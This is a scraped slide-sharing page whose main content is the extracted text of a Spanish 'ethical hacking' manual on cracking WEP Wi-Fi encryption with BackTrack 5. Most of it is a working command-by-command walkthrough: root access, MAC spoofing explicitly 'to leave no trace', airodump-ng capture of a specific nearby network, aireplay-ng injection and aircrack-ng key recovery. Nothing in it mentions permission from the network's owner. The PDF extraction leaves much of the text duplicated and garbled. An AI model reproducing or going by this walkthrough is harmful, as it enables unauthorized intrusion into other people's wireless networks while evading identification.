5 CRITERIOS PARA EL DISEÑO DE DIAGRAMAS DE FLUJO.pptx
5 CRITERIOS PARA EL DISEÑO DE DIAGRAMAS DE FLUJO.pptx5 CRITERIOS PARA EL DISEÑO DE DIAGRAMAS DE FLUJO.pptx
5 CRITERIOS PARA EL DISEÑO DE DIAGRAMAS DE FLUJO.pptx
AlexanderCR12
 
SEGURIDAD INFORMATICA- Ariana Vicente Cruzatt
SEGURIDAD INFORMATICA- Ariana Vicente CruzattSEGURIDAD INFORMATICA- Ariana Vicente Cruzatt
SEGURIDAD INFORMATICA- Ariana Vicente Cruzatt
vicenteariana54
 
Biografía Eugenio Díaz Castro su vida y su libros
Biografía Eugenio  Díaz Castro su vida y su librosBiografía Eugenio  Díaz Castro su vida y su libros
Biografía Eugenio Díaz Castro su vida y su libros
jhannimejia
 
10. Táctica y Estrategia en Fútbol autor Oscar Milton Rivas (1).pdf
10. Táctica y Estrategia en Fútbol autor Oscar Milton Rivas (1).pdf10. Táctica y Estrategia en Fútbol autor Oscar Milton Rivas (1).pdf
10. Táctica y Estrategia en Fútbol autor Oscar Milton Rivas (1).pdf
XxsmalXxYT
 
EXPERIENCIA PROYECTOS STARTUP JAVIER LASA
EXPERIENCIA PROYECTOS STARTUP JAVIER LASAEXPERIENCIA PROYECTOS STARTUP JAVIER LASA
EXPERIENCIA PROYECTOS STARTUP JAVIER LASA
Javier Lasa
 
blog.pdf de coceptos de personalidad....
blog.pdf de coceptos de personalidad....blog.pdf de coceptos de personalidad....
blog.pdf de coceptos de personalidad....
JosvilAngel
 
Presentación Arduino, proyecto colectivo
Presentación Arduino, proyecto colectivoPresentación Arduino, proyecto colectivo
Presentación Arduino, proyecto colectivo
juanlemus11122
 
Los derechos de autor y Ética Profesional
Los derechos de autor y Ética ProfesionalLos derechos de autor y Ética Profesional
Los derechos de autor y Ética Profesional
bgonzalezm20
 
Estructuras b-sicas_ conceptos b-sicos de programaci-n.pdf
Estructuras b-sicas_  conceptos b-sicos de programaci-n.pdfEstructuras b-sicas_  conceptos b-sicos de programaci-n.pdf
Estructuras b-sicas_ conceptos b-sicos de programaci-n.pdf
edepjuanorozco
 
WordPress training basics - básicos de cómo enseñar WordPress
WordPress training basics - básicos de cómo enseñar WordPressWordPress training basics - básicos de cómo enseñar WordPress
WordPress training basics - básicos de cómo enseñar WordPress
Fernando Tellado
 
ayuda en egresos exposición aps 1 grupal
ayuda en egresos exposición aps 1 grupalayuda en egresos exposición aps 1 grupal
ayuda en egresos exposición aps 1 grupal
jesusmedina766305
 
Clases de Informática primaria para niños de colegios católicos
Clases de Informática primaria para niños de colegios católicosClases de Informática primaria para niños de colegios católicos
Clases de Informática primaria para niños de colegios católicos
mcavero2019
 
derecho penal busqueda de pruebas en el derecho penal peruano latinoamericano
derecho penal busqueda de pruebas en el derecho penal peruano latinoamericanoderecho penal busqueda de pruebas en el derecho penal peruano latinoamericano
derecho penal busqueda de pruebas en el derecho penal peruano latinoamericano
edwinchiri2
 

Último (14)

Diapositiva Herramientas Web, Tema Web 3.0.pptx
Diapositiva Herramientas Web, Tema Web 3.0.pptxDiapositiva Herramientas Web, Tema Web 3.0.pptx
Diapositiva Herramientas Web, Tema Web 3.0.pptx
 
5 CRITERIOS PARA EL DISEÑO DE DIAGRAMAS DE FLUJO.pptx
5 CRITERIOS PARA EL DISEÑO DE DIAGRAMAS DE FLUJO.pptx5 CRITERIOS PARA EL DISEÑO DE DIAGRAMAS DE FLUJO.pptx
5 CRITERIOS PARA EL DISEÑO DE DIAGRAMAS DE FLUJO.pptx
 
SEGURIDAD INFORMATICA- Ariana Vicente Cruzatt
SEGURIDAD INFORMATICA- Ariana Vicente CruzattSEGURIDAD INFORMATICA- Ariana Vicente Cruzatt
SEGURIDAD INFORMATICA- Ariana Vicente Cruzatt
 
Biografía Eugenio Díaz Castro su vida y su libros
Biografía Eugenio  Díaz Castro su vida y su librosBiografía Eugenio  Díaz Castro su vida y su libros
Biografía Eugenio Díaz Castro su vida y su libros
 
10. Táctica y Estrategia en Fútbol autor Oscar Milton Rivas (1).pdf
10. Táctica y Estrategia en Fútbol autor Oscar Milton Rivas (1).pdf10. Táctica y Estrategia en Fútbol autor Oscar Milton Rivas (1).pdf
10. Táctica y Estrategia en Fútbol autor Oscar Milton Rivas (1).pdf
 
EXPERIENCIA PROYECTOS STARTUP JAVIER LASA
EXPERIENCIA PROYECTOS STARTUP JAVIER LASAEXPERIENCIA PROYECTOS STARTUP JAVIER LASA
EXPERIENCIA PROYECTOS STARTUP JAVIER LASA
 
blog.pdf de coceptos de personalidad....
blog.pdf de coceptos de personalidad....blog.pdf de coceptos de personalidad....
blog.pdf de coceptos de personalidad....
 
Presentación Arduino, proyecto colectivo
Presentación Arduino, proyecto colectivoPresentación Arduino, proyecto colectivo
Presentación Arduino, proyecto colectivo
 
Los derechos de autor y Ética Profesional
Los derechos de autor y Ética ProfesionalLos derechos de autor y Ética Profesional
Los derechos de autor y Ética Profesional
 
Estructuras b-sicas_ conceptos b-sicos de programaci-n.pdf
Estructuras b-sicas_  conceptos b-sicos de programaci-n.pdfEstructuras b-sicas_  conceptos b-sicos de programaci-n.pdf
Estructuras b-sicas_ conceptos b-sicos de programaci-n.pdf
 
WordPress training basics - básicos de cómo enseñar WordPress
WordPress training basics - básicos de cómo enseñar WordPressWordPress training basics - básicos de cómo enseñar WordPress
WordPress training basics - básicos de cómo enseñar WordPress
 
ayuda en egresos exposición aps 1 grupal
ayuda en egresos exposición aps 1 grupalayuda en egresos exposición aps 1 grupal
ayuda en egresos exposición aps 1 grupal
 
Clases de Informática primaria para niños de colegios católicos
Clases de Informática primaria para niños de colegios católicosClases de Informática primaria para niños de colegios católicos
Clases de Informática primaria para niños de colegios católicos
 
derecho penal busqueda de pruebas en el derecho penal peruano latinoamericano
derecho penal busqueda de pruebas en el derecho penal peruano latinoamericanoderecho penal busqueda de pruebas en el derecho penal peruano latinoamericano
derecho penal busqueda de pruebas en el derecho penal peruano latinoamericano
 

Manual de pentesting_sobre_ataque_a_encirptado_wep_con_backtrack_5

  • 1. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat@gmail.com Página 1
  • 2. Libro de Et Contacto: whitehat@gmail.com Edición Descubre como es el LSCA, Carlos Alberto Castruita Rodríguez Edición impresa en PDF protegida contra impresión y sobre escritura. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat@gmail.com Edición patrocinada por WhiteHat México el Arte del Hacking de una visión de un White Hat. Por Carlos Alberto Castruita Rodríguez Edición Independiente © 2015 impresa en PDF protegida contra impresión y sobre escritura. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING al Hacking para entrenamiento sobre ataques informáticos. Página 2 Arte del Hacking de una visión de un White Hat. Carlos Alberto Castruita Rodríguez impresa en PDF protegida contra impresión y sobre escritura.
  • 3. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat@gmail.com Página 3 Descubre desde cero como es Arte del Hacking de una visión de un White Hat. El libro de PENTESTING y de SEGURIDAD INFORMATICA está diseñado para hacer pruebas de vulnerabilidad de seguridad informática, robo de información y espionaje de datos, narrado a un nivel técnico para gentes con conocimiento de nivel básico a medio del área de informática o soporte técnico en sistemas. Autor: Carlos Alberto Castruita Rodríguez Director de WhiteHat - México Con 20 años de experiencia en el área sistemas. Certificado Hellermann Tyton Certificado 3com Networks Ethical Hacker Certificado Contacto: carlos.castruita@whitehatmexico.tk
  • 4. Libro de Et Contacto: whitehat@gmail.com EL ENCRIPTADO WEP Estoy casi convencido de haya lidiado mínimamente con su router. No en vano, el término siempre que debemos introducir la clave de nuestra Wi Internet. Pues bien, ¿a qué nos r trataré de explicar aquí. Con el título de este artículo he dado la pista clave y es que Equivalent Privacy, que en español sería Privacidad Equivalente a Cableado) es un sistema de cifrado de información que permite encriptar los datos que viajan a través de sistemas inalámbricos, es decir, lo que pasa a través de nuestra Wi se pretende dar una cobertura o protección a los datos que circulan por nuestra inalámbrica, los cuales están en pleno aire y al alcance de todos, y así protegerlos como si viajaran a través de un cable de red. Pero he aquí que la cosa al principio pareció ir bien per EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat@gmail.com EL ENCRIPTADO WEP Diagrama de RC4 que las siglas WEP no sonarán a extraño para cualquiera que haya lidiado mínimamente con su router. No en vano, el término siempre que debemos introducir la clave de nuestra Wi-Fi para poder conectarnos a Internet. Pues bien, ¿a qué nos referimos exactamente con WEP? Pues eso es lo que Con el título de este artículo he dado la pista clave y es que WEP (acrónimo para , que en español sería Privacidad Equivalente a Cableado) es un sistema cifrado de información que permite encriptar los datos que viajan a través de sistemas inalámbricos, es decir, lo que pasa a través de nuestra Wi-Fi. Mediante esta encriptación se pretende dar una cobertura o protección a los datos que circulan por nuestra inalámbrica, los cuales están en pleno aire y al alcance de todos, y así protegerlos como si viajaran a través de un cable de red. Pero he aquí que la cosa al principio pareció ir bien pero se torció ¡!! ¿la razón? el EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING al Hacking para entrenamiento sobre ataques informáticos. Página 4 1 no sonarán a extraño para cualquiera que haya lidiado mínimamente con su router. No en vano, el término WEP aparece casi Fi para poder conectarnos a eferimos exactamente con WEP? Pues eso es lo que (acrónimo para Wired , que en español sería Privacidad Equivalente a Cableado) es un sistema cifrado de información que permite encriptar los datos que viajan a través de sistemas Fi. Mediante esta encriptación se pretende dar una cobertura o protección a los datos que circulan por nuestra red inalámbrica, los cuales están en pleno aire y al alcance de todos, y así protegerlos como si ¿la razón? el RC4.
  • 5. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat@gmail.com Página 5 2 RC4 (River Cipher 4 o Ron’s Code 4 en honor a su creador Ron Rivest) es el algoritmo que utiliza WEP para encriptar la información, el cual resulta ser muy rápido pero en detrimento es simple, demasiado simple, tan simple que fue descartado como algoritmo para altos niveles de seguridad. Las redes encriptadas mediante WEP no son realmente seguras, pero a pesar de eso es la tipo de cifrado muy popular hoy en día. WEP fue uno de los primeros sistemas de cifrado para redes inalámbricas que salieron a la luz de forma comercial, de hecho casi todos los routers de los ISP nos dan una clave para encriptación WEP por defecto. Pero dejemos de hablar de los problemas del WEP y hablemos un poco de sus entrañas. La clave de la encriptación WEP está en la famosa contraseña que nos otorga nuestro ISP cuando contratamos sus servicios. Esa contraseña es vista por cualquier dispositivo como una secuencia de bits (unos y ceros) que puede tener un tamaño de 64 o 128, dependiendo del nivel de seguridad. Con la secuencia de bits de la contraseña se enmascara la información para que a ojos ajenos sea ilegible, pero que en cuanto aterriza en un dispositivo que también dispone de dicha contraseña se descodifique y se trate con normalidad. De todo esto lo que realmente hay que entender es que el cifrado WEP es realmente simple, tanto que hoy en día es relativamente sencillo el penetrar su seguridad.
  • 6. Libro de Et Contacto: whitehat@gmail.com Descarga el BackTrack 5 R3 Deberemos generar un CD de BacTrack 5 R3. Lo que necesitas: • Un CD de BackTrack 5 R3. • Un adaptador o tarjeta de red con capacidad de inyección de paquetes. • Una red WiFi cercana. Lo primero de todo es arrancar tu ordenador usando gráfico. Debes abrir una ventana de la terminal o consola (Ctrl+Alt+T). Y escribir el siguiente comando: >> ESCRIBIR: Sudo –s Estando ya como ROOT antes previamente escrito el password y estando ya con todos los recursos del sistema a disposición. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat@gmail.com BackTrack 5 R3 en un CD. CD de BacTrack 5 R3. BackTrack 5 R3. Un adaptador o tarjeta de red con capacidad de inyección de paquetes. cercana. Lo primero de todo es arrancar tu ordenador usando BackTrack, preferiblemente en modo Debes abrir una ventana de la terminal o consola (Ctrl+Alt+T). el siguiente comando: Sudo –s s { INTRO } ( para poder accesar como ROOT) Estando ya como ROOT antes previamente escrito el password y estando ya con todos los recursos del sistema a disposición. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING al Hacking para entrenamiento sobre ataques informáticos. Página 61 3 Un adaptador o tarjeta de red con capacidad de inyección de paquetes. BackTrack, preferiblemente en modo ( para poder accesar como ROOT) Estando ya como ROOT antes previamente escrito el password y estando ya con todos los
  • 7. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat@gmail.com Página 72 4 Pasando de usuario que en este caso es castruita pasamos a ROOT ósea administrador, así teniendo todos los privilegios para poder trabajar. Escribiremos el otro comando. Ifconfig >> ESCRIBIR: Ifconfig { INTRO } ( con este comando podremos ver la configuración y estatus de la tarjeta de red.) Escribiremos el otro comando. Airmon-ng >> ESCRIBIR: airmon-ng { INTRO } (el modo de monitoreo)
  • 8. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat@gmail.com Página 8 5 El comando anterior te dirá cuál es tu tarjeta inalámbrica, lo nombres más comunes son wlan0, ra0, eth0 ó eth1, cosas así por el estilo. Te darás cuenta de cuál es nombre de tu adaptador de red. El siguiente paso es cambiar la MAC de tu ordenador. Para ello debes introducir los siguientes comandos: Si tu tarjeta de red se llama wlan0, entonces los comandos serían: - airmon-ng - ifconfig - macchanger >> ESCRIBIR: airmon-ng stop wlan0 { INTRO } (Deshabilitamos el modo Monitoreo) Deshabilitamos la interface Wlan0 para poder después deshabilitar el dispositivo de red, que es el dispositivo rt2800usb.
  • 9. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat@gmail.com Página 96 Escribiremos el otro comando. ifconfig >> ESCRIBIR: ifconfig wlan0 down { INTRO } Con esta instrucción desconectamos la interface wlan0 del driver Prosiguiendo con siguiente comando macchanger >> ESCRIBIR: macchanger --mac 00:00:00:00:00:00 wlan0 { INTRO } Dondequiera que veas (tarjeta de red) debes reemplazarlo con el nombre de tu tarjeta de red. Nosotros hemos usado la MAC 00:11:22:33:44:55, pero tú puedes usar cualquiera que se te ocurra. Es importante ver que al poner el comando macccharger se concluya correctamente el cambio de MAC ADRRESS. El mac de nuestra tarjeta de red usb que es fabricada por EDIMAX, fue cambiada la mac por una de CIMSYS. Porque el cambio de numero de serie de nuestra tarjeta de red o cambio de MAC. Para no dejar rastro de nuestra identidad al momento del ataque al modem wifi. Nos aparece en la imagen la sentencia “ NEW MAC: “ con nuestra mac falsa obteniendo una identidad falsa del hardware que va a atacar. Ahora que ya tenemos nuestra nueva mac adrress daremos de alta los servicios, para empezar hacer el monitoreo.
  • 10. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat@gmail.com Página 10 Escribiremos el siguiente comando. ifconfig >> ESCRIBIR: ifconfig wlan0 up { INTRO } (damos de alta el servicio de nuestra tarjeta de red) >> ESCRIBIR: iwconfig mon0 { INTRO } ( nos muestra la configuración del monitor o Mon0) Ya que tenemos el servicio de la interface funcionando que es Wlan0 . Nuestro siguiente comando es Airmon-ng, el cual ya una de las herramientas que proporciona la suite de backtrack. Te recomiendo que tengas un cuaderno de apuntes y copies los comandos para que puedas ir memorizando las líneas para cuando hagas ataques en campo no te falle por falta de un comando o de error de escritura.
  • 11. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat@gmail.com Página 11 78 Bueno ya estamos con las herramientas de backtrack con la cual empezaremos con airmon-ng. >> ESCRIBIR: airmon-ng start wlan0 { INTRO } (script diseñado para convertir tarjetas inalámbricas en el monitor) Este script puede ser usado para activar el modo de monitor inalámbrico interfaces. También se puede utilizar para volver desde el modo de monitor para gestionados de modo. Entrando en el comando airmon-ng sin parámetros mostrará el estado de interfaces. El siguiente comando te permitirá ver cuáles son las redes WiFi que hay a tu alrededor.
  • 12. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat@gmail.com Página 12 9 Ya que ejecutamos el comando Airmon-ng , procederemos con el segundo comando que es Airodump-ng. Te muestro su sintaxis a continuación. airodump-ng <opciones> <interface>[,<interface>,...] Opciones: --ivs : Graba únicamente los IVs capturados --gpsd : Usa GPSd --w <nombre archivo>: Nombre del archivo donde guardar las capturas -write : Lo mismo que --w --beacons : Guardar todas las balizas o beacons en el archivo --netmask <máscara de red> : Filtrar APs por máscara --bssid <bssid> : Filtrar APs por BSSID Por defecto, airodump-ng va saltando alrededor de los canales 2.4Ghz. Puedes capturar en un canal específico usando: --channel <canal>: Capturar en un canal específico --band <abg> : Banda en la que actuará airodump-ng
  • 13. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat@gmail.com Página 13 10 --cswitch <método> : Saltar de canal con este método: 0 : FIFO (opción por defecto) 1 : Round Robin 2 : Saltar al último -s : Lo mismo que --cswitch >> ESCRIBIR: airodump-ng mon0 { INTRO } Airodump-ng se usa para capturar paquetes wireless 802.11 y es útil para ir acumulando vectores de inicialización IVS con el fin de intentar usarlos con aircrack-ng y obtener la clave WEP. Va a salir una lista con todas las redes inalámbricas alrededor, donde dice el BSSID (MAC del router que da la señal), PWR (Poder de señal), CHN (Canal en que se encuentra la red), ENC (Es el tipo de encriptación) y ESSID (Nombre de la red inalámbrica). Te mostrare abajo la tabla de los campos que usa Airodump-ng.
  • 14. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat@gmail.com Página 14 9 11 11 Campo Descripción BSSID Dirección MAC del punto de acceso. PWR Nivel de señal. Su significado depende del driver que usemos, pero cuanto mayor sea el PWR más cerca estaremos del AP o del cliente. Si el PWR es -1, significa que el driver no soporta la detección del nivel de señal. Si el PWR es -1 para algunos clientes (stations) es porque los paquetes proceden del AP hacia el cliente pero las transmisiones del cliente se encuentran fuera del rango de cobertura de tu tarjeta. Lo que significa que solo escuchas la mitad de la comunicación. Si todos los clientes tienen PWR -1 significa que el driver no tiene la cpacidad de detectar el nivel de señal. RXQ Calidad de recepción calculada a través del porcentaje de paquetes (management y paquetes de datos) recividos correctamente en los últimos 10 segundos. Mira la nota para una explicación más detallada. Beacons Número de “paquetes anucio” o beacons enviadas por el AP. Cada punto de acceso envia alrededor de diez beacons por segundo cuando el rate o velocidad es de 1M, (la más baja) de tal forma que se pueden recibir desde muy lejos. # Data Número de paquetes de datos capturados (si tiene clave WEP, equivale tambien al número de IVs), incluyendo paquetes de datos broadcast (dirigidos a todos los clientes). #/s Número de paquetes de datos capturados por segundo calculando la media de los últimos 10 segundos. CH Número de canal (obtenido de los “paquetes anuncio” o beacons). Nota: Algunas veces se capturan paquetes de otros canales, incluso si airodump-ng no está saltando de canal en canal, debido a interferencias o solapamientos en la señal. MB Velocidad máxima soportada por el AP. Si MB = 11, es 802.11b, si MB = 22es 802.11b+ y velocidades mayores son 802.11g. El punto (despues del 54) indica que esa red soporta un preámbulo corto o “short preamble”. ENC Algoritmo de encriptación que se usa. OPN = no existe encriptación (abierta),”WEP?” = WEP u otra (no se han capturado suficientes paquetes de datos para saber si es WEP o WPA/WPA2), WEP (sin el interrogante) indica WEP estática o dinámica, y WPA o WPA2 en el caso de que se use TKIP o CCMP. CIPHER Detector cipher. Puede ser CCMP, WRAP, TKIP, WEP, WEP40, o WEP104.
  • 15. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat@gmail.com Página 15 AUTH El protocolo de autenticación usado. Puede ser MGT, PSK (clave precompartida), o OPN (abierta). ESSID Tambien llamado “SSID”, que puede estar en blanco si la ocultación del SSID está activada en el AP. En este caso, airodump-ng intentará averiguar el SSID analizando paquetes “probe responses” y “association requests” (son paquetes enviados desde un cliente al AP). STATION Dirección MAC de cada cliente asociado. Lost El número de paquetes perdidos en los últimos 10 segundos. Packets El número de paquetes de datos enviados por el cliente. Probes Los ESSIDs a los cuales ha intentado conectarse el cliente. Cuando veas la red que deseas hackear, pulsa Ctrl + C para detener el escaneo quedando la lista final. Resalta la fila perteneciente a la red de interés, y tomar nota de dos cosas: su BSSID y su canal (en la columna CH), como se ilustra a continuación. Es evidente que la red que desea crackear debe tener cifrado WEP (en la columna ENC), no debe tener WPA, ni ninguna otra cosa. Ahora vamos a ver lo que está pasando con la red que hayas elegido y capturar esa información en un archivo. Subraye la ESSID con la que vamos trabajar en este libro que es INFINITUM2ABB72.
  • 16. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat@gmail.com Página 16 1413 Vemos que ya tenemos un wifi wep, cuyos datos son los siguientes: ESSID: INFINITUM2ABB72 ENC: WEP CHANEL: 1 BSSID: 00:24:17:81:B4:0D PWR: -78 Nos indica PWR, que nuestro wifi que deseamos atacar esta un poco retirado, y que nos puede tardar un poco mas de tiempo en obtener la cantidad de paquetes que necesitamos acumular para obtener la contraseña. >> ESCRIBIR: airodump-ng -c (canal) -w (nombre del archivo) --bssid (bssid) mon0 { INTRO } Entendemos ya con nuestros datos que la red que deseas hackear es INFINITUM2ABB72, que su canal es 1, que deseamos ponerle al archivo de escritura de los datos como ‘hackingwifi’ y que el bssid es 00:24:17:81:B4:0D, entonces el comando sería: airodump-ng -c 1 -w hackingwifi --bssid 00:24:17:81:B4:0D mon0
  • 17. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat@gmail.com Página 17 Ahora ya estas capturando datos!!!!, ahora fíjate que hay una columna que dice DATA, estos son los paquetes que llevas capturados, para poder descifrar la clave WEP como mínimo debes capturar unos 20,000 paquetes. Yo recomiendo 30,000. Notarás que puede ir muy lento, esto significa que ninguna persona está utilizando la red en el momento. Entonces no está generando tráfico y te podría llevar demasiado tiempo llegar a los 20,000 paquetes. Por suerte tú mismo puedes inyectarle tráfico a la red y para eso es el comando siguiente. Abre una nueva ventana de la consola y escribe el siguiente comando: Aireplay-ng. SINTAXIS: aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) mon0 -a es el bssid de la red que estamos atacando. -h es la mac falsa que le diste a tu tarjeta de red al principio. -e es el nombre de la red que estamos atacando. >> ESCRIBIR: aireplay-ng -1 0 -a 00:24:17:81:B4:0D -h 00:11:22:33:44:55 - e INFINITUM2ABB72 mon0 { INTRO }
  • 18. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat@gmail.com Página 18 15 Después de introducir el comando deberían aparecer 4 líneas de códigos y la final debe decir que la conexión ha sido exitosa (“Association successful”), esto significa que estas conectado en capa 2 del router de la red que estás atacando. Si por alguna razón no te puedes conectar, entonces las causas pueden ser las siguientes: • La red que quieres atacar está muy lejos. • Tu tarjeta de red no puede hacer inyección de paquetes. • El router que quieres atacar tiene seguridad para evitar este tipo de ataques. Ahora para inyectarle el tráfico introduce el siguiente comando: Aireplay-ng >> ESCRIBIR: aireplay-ng -3 -b 00:24:17:81:B4:0D -h 00:11:22:33:44:55 mon0 { INTRO }
  • 19. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat@gmail.com Página 19 Dónde: -b es el bssid de la red que estamos atacando. -h es la MAC falsa que le dimos a tu tarjeta de red inalámbrica. Verás que se empezaran a inyectar paquetes, si vas a ver a la otra terminal donde estás capturando los paquetes te darás cuenta que la columna de DATA ahora avanzará mucho más rápido. Dependiendo de la potencia de la red que estés atacando este proceso podría tomar algún tiempo. Es cuestión de que dejes el ordenador trabajar y vayas a dar una vuelta hasta que data llegue a 30,000 paquetes. Al llegar a los 30,000 paquetes o IVs pulsaremos CTRL+ C, para frenar la operación. A continuación escribiremos el comando: Dir >> ESCRIBIR: dir { INTRO } Nos muestra el directorio una serie de archivos generados con el nombre de archivo hackingwifi + 01, con extensiones .cap, .csv, kismet.csv, kismet.netxml. Seleccionamos el archivo hackingwifi-01.cap para poder obtener la contraseña del wifi atacado.
  • 20. EL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKINGEL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat@gmail.com Página 20 1617 Ejecuta el siguiente comando para recuperar que los datos que hemos recogido: SINTAXIS: aircrack-ng -b (bssid) (nombre de archivo-01.cap) O aircrack-ng (nombre de archivo-01.cap) >>ESCRIBIR: aircrack-ng -b hackingwifi-01.cap { INTRO } Si no has recopilado suficientes datos, aircrack presentará un error y te dirá que vuelvas a intentarlo con más datos. Si tienes éxito, se verá así, KEY FOUND [ 87:F2:71:32:E6 ]